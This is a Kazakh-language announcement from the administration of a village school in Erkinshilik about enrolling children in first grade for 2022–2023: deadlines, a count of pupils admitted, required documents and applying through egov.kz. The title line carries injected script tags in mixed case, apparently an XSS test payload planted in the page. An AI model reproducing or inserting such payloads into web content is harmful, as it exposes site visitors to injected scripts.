Құрметті Еркіншілік ауылының тұрғындары!<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

16.06.2022

2022 жылдың  01 сәуірінен бастап 1 сыныпқа қабылдау жүріп жатыр. Біз  бүгінгі күнге болашақ бірінші сыныпқа 74 оқушы қабылдадық.1 сыныпқа қабылданбаған 6 жастағы балалар мен 2022 жылдың желтоқсанына дейін 6 жасқа толған балалардың ата-аналары да 1 сыныпқа қабылдау үшін құжаттарды тапсыра алатындығына назар аударамыз.
Бірінші сынып оқушыларын мектепке қабылдау 1 сәуірден бастап Қазақстан Республикасы Білім және ғылым министрінің 12 қазан 2018ж #564. бұйрығы негізінде болғаны, ол 01 қыркүйек 2022-2023 оқу жылына дейін 1 сыныпқа қанша бала баратынын білу, қанша оқулық сатып алу керектігін, қанша сынып жиынтығы құрылатынын біліп әрекет жасау үшін қажет.
Ескертеміз, балаларды мектепке қабылдау автоматтандырылған және веб-портал арқылы жүзеге асырылады, egov.kz.
1-сыныпқа балалар ата-анасының немесе білім алушының заңды өкілінің жеке өтініші негізінде қабылданады. Сондай-ақ, төмендегідей  құжаттар қажет:
-  баланың туу туралы куәлігінің көшірмесі;
-  026/е-3 нысаны бойынша денсаулық жағдайы туралы құжат;
- 065/е нысаны бойынша денсаулық жағдайы туралы құжат;
-  3х4 көлемі /екі дана фотосурет/
Егер, 1 сыныпқа  құжаттарды тапсырмаған ата-аналар болса, тұрғылықты мекен-жайы бойынша құжаттарды тапсыруды кешіктірмеулеріңізді сұраймыз.
Құрметпен "Еркіншілік ауылының жалпы білім беретін мектебі" КММ әкімшілігі.
 

Просмотров: 666


Пікір қосу



Деректерді қолтаңбаға қосу